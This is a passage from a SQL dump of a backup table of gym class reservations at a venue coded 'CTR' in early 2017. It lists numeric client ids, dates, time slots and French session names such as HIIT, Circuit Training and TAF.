(8739, 56, 'CTR', '2017-01-16', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8740, 56, 'CTR', '2017-01-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8741, 80, 'CTR', '2017-01-16', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8742, 80, 'CTR', '2017-01-16', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8743, 80, 'CTR', '2017-01-16', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8744, 80, 'CTR', '2017-01-16', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8745, 80, 'CTR', '2017-01-16', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8746, 80, 'CTR', '2017-01-16', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8747, 80, 'CTR', '2017-01-16', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8748, 80, 'CTR', '2017-01-16', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8749, 80, 'CTR', '2017-01-16', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8750, 80, 'CTR', '2017-01-16', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8752, 258, 'CTR', '2017-01-16', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8755, 48, 'CTR', '2017-01-18', '19h ', '19h30', 'Circuit training'),
(8757, 31, 'CTR', '2017-01-18', '18h15', '18h45', 'Circuit Training'),
(8758, 31, 'CTR', '2017-01-18', '19h ', '19h30', 'Circuit training'),
(8759, 132, 'CTR', '2017-01-18', '18h15', '18h45', 'Circuit Training'),
(8760, 132, 'CTR', '2017-01-18', '19h ', '19h30', 'Circuit training'),
(8761, 231, 'CTR', '2017-01-18', '18h15', '18h45', 'Circuit Training'),
(8778, 205, 'CTR', '2017-01-18', '19h ', '19h30', 'Circuit training'),
(8763, 195, 'CTR', '2017-01-18', '18h15', '18h45', 'Circuit Training'),
(8764, 205, 'CTR', '2017-01-18', '18h15', '18h45', 'Circuit Training'),
(8765, 90, 'CTR', '2017-01-18', '20h30', '21h00', 'Circuit Training'),
(8766, 90, 'CTR', '2017-01-18', '20h30', '21h00', 'Circuit Training'),
(8767, 173, 'CTR', '2017-01-18', '20h30', '21h00', 'Circuit Training'),
(8768, 247, 'CTR', '2017-01-18', '20h30', '21h00', 'Circuit Training'),
(8769, 247, 'CTR', '2017-01-18', '20h30', '21h00', 'Circuit Training'),
(8770, 196, 'CTR', '2017-01-18', '20h30', '21h00', 'Circuit Training'),
(8771, 205, 'CTR', '2017-01-19', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8821, 263, 'CTR', '2017-01-30', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8773, 263, 'CTR', '2017-01-23', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8774, 263, 'CTR', '2017-01-23', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8775, 188, 'CTR', '2017-01-23', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8776, 231, 'CTR', '2017-01-23', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8777, 233, 'CTR', '2017-01-18', '19h ', '19h30', 'Circuit training'),
(8779, 210, 'CTR', '2017-01-19', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8780, 48, 'CTR', '2017-01-19', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8822, 263, 'CTR', '2017-01-30', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8783, 80, 'CTR', '2017-01-23', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8784, 205, 'CTR', '2017-01-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8785, 205, 'CTR', '2017-01-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8786, 230, 'CTR', '2017-01-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8787, 230, 'CTR', '2017-01-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8788, 249, 'CTR', '2017-01-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8789, 249, 'CTR', '2017-01-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8790, 48, 'CTR', '2017-01-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8791, 48, 'CTR', '2017-01-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8792, 132, 'CTR', '2017-01-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8793, 132, 'CTR', '2017-01-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8794, 264, 'CTR', '2017-01-23', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8795, 264, 'CTR', '2017-01-23', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8796, 138, 'CTR', '2017-01-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8797, 138, 'CTR', '2017-01-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8798, 241, 'CTR', '2017-01-25', '19h ', '19h30', 'Circuit training'),
(8799, 80, 'CTR', '2017-01-23', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8800, 80, 'CTR', '2017-01-23', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8801, 265, 'CTR', '2017-01-23', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8802, 265, 'CTR', '2017-01-23', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8803, 265, 'CTR', '2017-01-23', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8804, 265, 'CTR', '2017-01-23', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8805, 48, 'CTR', '2017-01-25', '18h15', '18h45', 'Circuit Training'),
(8807, 231, 'CTR', '2017-01-25', '18h15', '18h45', 'Circuit Training'),
(8808, 195, 'CTR', '2017-01-25', '18h15', '18h45', 'Circuit Training'),
(8809, 132, 'CTR', '2017-01-25', '18h15', '18h45', 'Circuit Training'),
(8810, 213, 'CTR', '2017-01-24', '19h00', '19h30', 'Duo Training'),
(8811, 48, 'CTR', '2017-01-25', '19h ', '19h30', 'Circuit training'),
(8819, 230, 'CTR', '2017-01-26', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8813, 132, 'CTR', '2017-01-25', '19h ', '19h30', 'Circuit training'),
(8827, 230, 'CTR', '2017-01-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8815, 247, 'CTR', '2017-01-25', '20h30', '21h00', 'Circuit Training'),
(8816, 247, 'CTR', '2017-01-25', '20h30', '21h00', 'Circuit Training'),
(8817, 196, 'CTR', '2017-01-25', '20h30', '21h00', 'Circuit Training'),
(8847, 31, 'CTR', '2017-02-01', '18h15', '18h45', 'Circuit Training'),
(8891, 188, 'CTR', '2017-02-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8823, 263, 'CTR', '2017-01-30', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8824, 248, 'CTR', '2017-01-30', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8825, 231, 'CTR', '2017-01-30', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8826, 188, 'CTR', '2017-01-30', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8828, 230, 'CTR', '2017-01-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8829, 249, 'CTR', '2017-01-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8830, 249, 'CTR', '2017-01-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8831, 132, 'CTR', '2017-01-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8832, 132, 'CTR', '2017-01-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8833, 48, 'CTR', '2017-01-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8834, 48, 'CTR', '2017-01-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8835, 264, 'CTR', '2017-01-30', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8836, 264, 'CTR', '2017-01-30', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8837, 265, 'CTR', '2017-01-30', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8838, 265, 'CTR', '2017-01-30', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8839, 265, 'CTR', '2017-01-30', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8840, 265, 'CTR', '2017-01-30', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8841, 80, 'CTR', '2017-01-30', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8842, 80, 'CTR', '2017-01-30', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8843, 266, 'CTR', '2017-01-30', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8844, 266, 'CTR', '2017-01-30', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8857, 260, 'CTR', '2017-01-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8858, 260, 'CTR', '2017-01-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8848, 31, 'CTR', '2017-02-01', '19h ', '19h30', 'Circuit training'),
(8849, 188, 'CTR', '2017-01-29', '18h00', '18h45', 'Jeudi oubli d\'encodage'),
(8850, 188, 'CTR', '2017-01-29', '18h00', '18h45', 'Jeudi oubli d\'encodage'),
(8851, 205, 'CTR', '2017-01-29', '18h00', '18h45', 'Jeudi oubli d\'encodage'),
(8852, 189, 'CTR', '2017-01-29', '18h00', '18h45', 'Jeudi oubli d\'encodage'),
(8853, 28, 'CTR', '2017-01-29', '18h00', '18h45', 'Jeudi oubli d\'encodage'),
(8854, 267, 'CTR', '2017-01-29', '18h00', '18h45', 'Jeudi oubli d\'encodage'),
(8855, 268, 'CTR', '2017-01-29', '18h00', '18h45', 'Jeudi oubli d\'encodage'),
(8856, 213, 'CTR', '2017-01-31', '19h00', '19h30', 'Duo Training'),
(8859, 80, 'CTR', '2017-01-30', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8860, 210, 'CTR', '2017-02-01', '18h15', '18h45', 'Circuit Training'),
(8861, 48, 'CTR', '2017-02-01', '18h15', '18h45', 'Circuit Training'),
(8862, 48, 'CTR', '2017-02-01', '19h ', '19h30', 'Circuit training'),
(8880, 193, 'CTR', '2017-02-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8864, 231, 'CTR', '2017-02-01', '18h15', '18h45', 'Circuit Training'),
(8865, 195, 'CTR', '2017-02-01', '18h15', '18h45', 'Circuit Training'),
(8866, 80, 'CTR', '2017-02-01', '18h15', '18h45', 'Circuit Training'),
(8867, 132, 'CTR', '2017-02-01', '19h ', '19h30', 'Circuit training'),
(8868, 241, 'CTR', '2017-02-01', '19h ', '19h30', 'Circuit training'),
(8869, 80, 'CTR', '2017-02-01', '19h ', '19h30', 'Circuit training'),
(8870, 205, 'CTR', '2017-02-01', '19h ', '19h30', 'Circuit training'),
(8871, 173, 'CTR', '2017-02-01', '20h30', '21h00', 'Circuit Training'),
(8872, 247, 'CTR', '2017-02-01', '20h30', '21h00', 'Circuit Training'),
(9292, 265, 'CTR', '2017-03-17', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(8874, 247, 'CTR', '2017-02-01', '20h30', '21h00', 'Circuit Training'),
(8875, 188, 'CTR', '2017-02-01', '20h30', '21h00', 'Circuit Training'),
(8876, 196, 'CTR', '2017-02-01', '20h30', '21h00', 'Circuit Training'),
(8877, 90, 'CTR', '2017-02-01', '20h30', '21h00', 'Circuit Training'),
(8878, 90, 'CTR', '2017-02-01', '20h30', '21h00', 'Circuit Training'),
(8879, 205, 'CTR', '2017-02-02', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8881, 193, 'CTR', '2017-02-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8883, 230, 'CTR', '2017-02-02', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8884, 188, 'CTR', '2017-02-03', '8h00', '9h00', 'Séance jeudi 2/2 à 12h45'),
(8885, 28, 'CTR', '2017-02-03', '8h00', '9h00', 'Séance jeudi 2/2 à 12h45'),
(8886, 224, 'CTR', '2017-02-03', '8h00', '9h00', 'Séance jeudi 2/2 à 12h45'),
(8887, 267, 'CTR', '2017-02-03', '8h00', '9h00', 'Séance jeudi 2/2 à 12h45'),
(8888, 268, 'CTR', '2017-02-03', '8h00', '9h00', 'Séance jeudi 2/2 à 12h45'),
(8889, 205, 'CTR', '2017-02-03', '8h00', '9h00', 'Séance jeudi 2/2 à 12h45'),
(8890, 189, 'CTR', '2017-02-03', '8h00', '9h00', 'Séance jeudi 2/2 à 12h45'),
(8892, 248, 'CTR', '2017-02-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8893, 231, 'CTR', '2017-02-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8894, 263, 'CTR', '2017-02-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8895, 263, 'CTR', '2017-02-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8896, 263, 'CTR', '2017-02-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8897, 205, 'CTR', '2017-02-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8898, 205, 'CTR', '2017-02-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8899, 48, 'CTR', '2017-02-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8900, 48, 'CTR', '2017-02-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8901, 230, 'CTR', '2017-02-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8902, 230, 'CTR', '2017-02-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8903, 132, 'CTR', '2017-02-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8904, 132, 'CTR', '2017-02-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8905, 249, 'CTR', '2017-02-06', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8906, 249, 'CTR', '2017-02-06', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8907, 260, 'CTR', '2017-02-06', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8908, 260, 'CTR', '2017-02-06', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8909, 80, 'CTR', '2017-02-06', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8910, 80, 'CTR', '2017-02-06', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8911, 264, 'CTR', '2017-02-06', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8912, 264, 'CTR', '2017-02-06', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8913, 265, 'CTR', '2017-02-06', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8951, 80, 'CTR', '2017-02-13', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8915, 265, 'CTR', '2017-02-06', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8952, 80, 'CTR', '2017-02-13', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8917, 270, 'CTR', '2017-02-06', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8918, 270, 'CTR', '2017-02-06', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8919, 180, 'CTR', '2017-02-06', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8920, 180, 'CTR', '2017-02-06', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8921, 228, 'CTR', '2017-02-08', '18h15', '18h45', 'Circuit Training'),
(8922, 228, 'CTR', '2017-02-08', '19h ', '19h30', 'Circuit training'),
(8923, 188, 'CTR', '2017-02-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8967, 48, 'CTR', '2017-02-08', '18h15', '18h45', 'Circuit Training'),
(8925, 188, 'CTR', '2017-02-13', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8926, 188, 'CTR', '2017-02-13', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8927, 263, 'CTR', '2017-02-13', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8928, 263, 'CTR', '2017-02-13', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8929, 263, 'CTR', '2017-02-13', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8930, 248, 'CTR', '2017-02-13', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8931, 231, 'CTR', '2017-02-13', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8932, 205, 'CTR', '2017-02-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8933, 205, 'CTR', '2017-02-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8987, 138, 'CTR', '2017-02-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8986, 138, 'CTR', '2017-02-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8936, 48, 'CTR', '2017-02-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8937, 48, 'CTR', '2017-02-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8938, 132, 'CTR', '2017-02-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8939, 132, 'CTR', '2017-02-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8940, 271, 'CTR', '2017-02-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8941, 271, 'CTR', '2017-02-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8942, 180, 'CTR', '2017-02-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8943, 180, 'CTR', '2017-02-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8944, 249, 'CTR', '2017-02-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8945, 249, 'CTR', '2017-02-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8946, 264, 'CTR', '2017-02-13', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8948, 264, 'CTR', '2017-02-13', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8949, 266, 'CTR', '2017-02-13', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8950, 266, 'CTR', '2017-02-13', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8953, 265, 'CTR', '2017-02-13', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8954, 265, 'CTR', '2017-02-13', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8955, 265, 'CTR', '2017-02-13', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8956, 265, 'CTR', '2017-02-13', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8957, 272, 'CTR', '2017-02-13', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8958, 272, 'CTR', '2017-02-13', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8959, 273, 'CTR', '2017-02-13', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8960, 273, 'CTR', '2017-02-13', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8961, 274, 'CTR', '2017-02-13', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8962, 274, 'CTR', '2017-02-13', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8963, 275, 'CTR', '2017-02-13', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8964, 275, 'CTR', '2017-02-13', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8965, 270, 'CTR', '2017-02-13', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(8966, 270, 'CTR', '2017-02-13', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(8968, 48, 'CTR', '2017-02-08', '19h ', '19h30', 'Circuit training'),
(8970, 31, 'CTR', '2017-02-08', '18h15', '18h45', 'Circuit Training'),
(8971, 195, 'CTR', '2017-02-08', '18h15', '18h45', 'Circuit Training'),
(8972, 276, 'CTR', '2017-02-08', '18h15', '18h45', 'Circuit Training'),
(8973, 231, 'CTR', '2017-02-08', '18h15', '18h45', 'Circuit Training'),
(8974, 241, 'CTR', '2017-02-08', '18h15', '18h45', 'Circuit Training'),
(8975, 31, 'CTR', '2017-02-08', '19h ', '19h30', 'Circuit training'),
(8976, 205, 'CTR', '2017-02-08', '19h ', '19h30', 'Circuit training'),
(8977, 90, 'CTR', '2017-02-08', '20h30', '21h00', 'Circuit Training'),
(8978, 90, 'CTR', '2017-02-08', '20h30', '21h00', 'Circuit Training'),
(8979, 196, 'CTR', '2017-02-08', '20h30', '21h00', 'Circuit Training'),
(8980, 173, 'CTR', '2017-02-08', '20h30', '21h00', 'Circuit Training'),
(8981, 188, 'CTR', '2017-02-08', '20h30', '21h00', 'Circuit Training'),
(8982, 210, 'CTR', '2017-02-08', '18h15', '18h45', 'Circuit Training'),
(8983, 210, 'CTR', '2017-02-08', '19h ', '19h30', 'Circuit training'),
(8984, 258, 'CTR', '2017-02-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8985, 258, 'CTR', '2017-02-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8988, 228, 'CTR', '2017-02-13', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8989, 230, 'CTR', '2017-02-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8990, 230, 'CTR', '2017-02-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8991, 230, 'CTR', '2017-02-16', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8992, 48, 'CTR', '2017-02-15', '18h15', '18h45', 'Circuit Training'),
(8993, 31, 'CTR', '2017-02-15', '18h15', '18h45', 'Circuit Training'),
(8994, 195, 'CTR', '2017-02-15', '18h15', '18h45', 'Circuit Training'),
(9006, 205, 'CTR', '2017-02-15', '19h ', '19h30', 'Circuit training'),
(8996, 231, 'CTR', '2017-02-15', '18h15', '18h45', 'Circuit Training'),
(8997, 48, 'CTR', '2017-02-15', '19h ', '19h30', 'Circuit training'),
(8998, 31, 'CTR', '2017-02-15', '19h ', '19h30', 'Circuit training'),
(8999, 173, 'CTR', '2017-02-15', '20h30', '21h00', 'Circuit Training'),
(9000, 247, 'CTR', '2017-02-15', '20h30', '21h00', 'Circuit Training'),
(9001, 247, 'CTR', '2017-02-15', '20h30', '21h00', 'Circuit Training'),
(9002, 90, 'CTR', '2017-02-15', '20h30', '21h00', 'Circuit Training'),
(9003, 188, 'CTR', '2017-02-15', '20h30', '21h00', 'Circuit Training'),
(9007, 191, 'CTR', '2017-02-16', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9008, 267, 'CTR', '2017-02-17', '12h45', '13h15', 'Séance jeudi 16/2 à 12h45'),
(9009, 268, 'CTR', '2017-02-17', '12h45', '13h15', 'Séance jeudi 16/2 à 12h45'),
(9010, 189, 'CTR', '2017-02-17', '12h45', '13h15', 'Séance jeudi 16/2 à 12h45'),
(9016, 205, 'CTR', '2017-02-17', '12h45', '13h15', 'Séance jeudi 16/2 à 12h45'),
(9012, 28, 'CTR', '2017-02-17', '12h45', '13h15', 'Séance jeudi 16/2 à 12h45'),
(9013, 199, 'CTR', '2017-02-17', '12h45', '13h15', 'Séance jeudi 16/2 à 12h45'),
(9014, 224, 'CTR', '2017-02-17', '12h45', '13h15', 'Séance jeudi 16/2 à 12h45'),
(9015, 188, 'CTR', '2017-02-17', '12h45', '13h15', 'Séance jeudi 16/2 à 12h45'),
(9022, 231, 'CTR', '2017-02-20', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9018, 228, 'CTR', '2017-02-22', '18h15', '18h45', 'Circuit Training'),
(9019, 138, 'CTR', '2017-02-22', '19h ', '19h30', 'Circuit training'),
(9020, 31, 'CTR', '2017-02-22', '18h15', '18h45', 'Circuit Training'),
(9021, 31, 'CTR', '2017-02-22', '19h ', '19h30', 'Circuit training');
INSERT INTO `reservation_reservation_bck` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(9087, 191, 'CTR', '2017-02-23', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9024, 188, 'CTR', '2017-02-20', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9025, 263, 'CTR', '2017-02-20', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9026, 263, 'CTR', '2017-02-20', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9027, 248, 'CTR', '2017-02-20', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9028, 258, 'CTR', '2017-02-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9029, 258, 'CTR', '2017-02-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9030, 48, 'CTR', '2017-02-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9031, 48, 'CTR', '2017-02-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9084, 277, 'CTR', '2017-02-22', '19h45', '20h15', 'Groupe Privé'),
(9034, 205, 'CTR', '2017-02-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9035, 205, 'CTR', '2017-02-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9036, 265, 'CTR', '2017-02-20', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(9037, 265, 'CTR', '2017-02-20', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(9038, 265, 'CTR', '2017-02-20', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(9039, 265, 'CTR', '2017-02-20', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(9040, 249, 'CTR', '2017-02-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9041, 249, 'CTR', '2017-02-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9042, 260, 'CTR', '2017-02-20', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(9043, 260, 'CTR', '2017-02-20', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(9044, 266, 'CTR', '2017-02-20', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(9045, 266, 'CTR', '2017-02-20', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(9046, 275, 'CTR', '2017-02-20', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(9047, 275, 'CTR', '2017-02-20', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(9082, 210, 'CTR', '2017-02-22', '18h15', '18h45', 'Circuit Training'),
(9083, 80, 'CTR', '2017-02-22', '18h15', '18h45', 'Circuit Training'),
(9050, 274, 'CTR', '2017-02-20', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(9051, 274, 'CTR', '2017-02-20', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(9052, 80, 'CTR', '2017-02-20', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(9053, 80, 'CTR', '2017-02-20', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(9054, 180, 'CTR', '2017-02-20', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(9055, 180, 'CTR', '2017-02-20', '19h45', '20h15', 'HIIT Partie 2 (avec cardio)'),
(9056, 213, 'CTR', '2017-02-21', '19h00', '19h30', 'Duo Training'),
(9057, 48, 'CTR', '2017-02-22', '18h15', '18h45', 'Circuit Training'),
(9058, 48, 'CTR', '2017-02-22', '19h ', '19h30', 'Circuit training'),
(9059, 195, 'CTR', '2017-02-22', '18h15', '18h45', 'Circuit Training'),
(9060, 231, 'CTR', '2017-02-22', '18h15', '18h45', 'Circuit Training'),
(9061, 205, 'CTR', '2017-02-22', '19h ', '19h30', 'Circuit training'),
(9062, 90, 'CTR', '2017-02-22', '20h30', '21h00', 'Circuit Training'),
(9085, 132, 'CTR', '2017-02-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9064, 173, 'CTR', '2017-02-22', '20h30', '21h00', 'Circuit Training'),
(9065, 188, 'CTR', '2017-02-22', '20h30', '21h00', 'Circuit Training'),
(9066, 247, 'CTR', '2017-02-22', '20h30', '21h00', 'Circuit Training'),
(9067, 247, 'CTR', '2017-02-22', '20h30', '21h00', 'Circuit Training'),
(9125, 48, 'CTR', '2017-03-01', '18h15', '18h45', 'Circuit Training'),
(9069, 189, 'CTR', '2017-02-23', '12h45', '13h15', 'Circuit Training'),
(9070, 188, 'CTR', '2017-02-23', '12h45', '13h15', 'Circuit Training'),
(9071, 205, 'CTR', '2017-02-23', '12h45', '13h15', 'Circuit Training'),
(9072, 199, 'CTR', '2017-02-23', '12h45', '13h15', 'Circuit Training'),
